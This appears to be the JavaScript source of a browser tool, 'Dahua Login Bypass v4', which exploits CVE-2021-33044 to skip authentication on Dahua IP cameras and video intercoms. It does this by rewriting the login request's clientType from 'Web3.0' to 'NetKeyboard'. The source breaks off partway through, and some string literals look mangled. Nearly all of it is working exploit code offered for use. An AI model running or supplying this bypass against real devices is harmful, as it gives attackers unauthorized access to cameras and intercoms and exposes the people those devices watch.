async function loginBypass()
{
function HtmlAttributeEncode(str)
{
let sb = [];
for (let i = 0; i < str.length; i++)
switch (str.charAt(i))
{
case '"':
sb.push(""");
break;
case '\'':
sb.push("'");
break;
case '&':
sb.push("&");
break;
case '<':
sb.push("<");
break;
case '>':
sb.push(">");
break;
default:
sb.push(str.charAt(i));
break;
}
return sb.join('');
}
function MakeExtendOverride(originalMethod)
{
return function ()
{
let extended = PLACEHOLDER.apply(window, arguments);
if (extended
&& typeof extended.userName !== "undefined"
&& extended.password
&& extended.clientType === "Web3.0"
)
{
extended.clientType = "NetKeyboard";
}
return extended;
}.toString().replace('PLACEHOLDER', originalMethod);
}
let allSelectorSets = [
{ user: '#login_user', pass: '#login_psw', login: 'a[btn-for="onLogin"]' },
{ user: '#loginUsername-inputEl', pass: '#loginPassword-inputEl', login: '#loginButton' }
];
let pageSelectors = null;
for (let i = 0; i < allSelectorSets.length; i++)
{
let s = allSelectorSets[i];
if (document.querySelector(s.user) && document.querySelector(s.pass) && document.querySelector(s.login))
{
pageSelectors = s;
break;
}
}
if (!pageSelectors)
{
if (!confirm("This page was not identified as a Dahua login page. Run Login Bypass script anyway?"))
return;
}
if (window.bypassLoaded)
{
alert('Dahua Login Bypass has already been loaded on this page. Please reload the page if you want to try again.');
return;
}
window.bypassLoaded = true;
let hackMenu = '
Dahua Login Bypass v4 ✨
';
hackMenu += '
This extension exploits CVE-2021-33044 to bypass authentication in Dahua IP cameras and VTH/VTO (video intercom) devices. '
+ 'For other device types (NVR/DVR/XVR, etc), there exists CVE-2021-33045 which cannot be exploited with an ordinary web browser.
'
+ '
These vulnerabilities are likely to be fixed in firmware released after Sept 2021.
';
hackMenu += '
Credit for discovering the vulnerabilities: bashis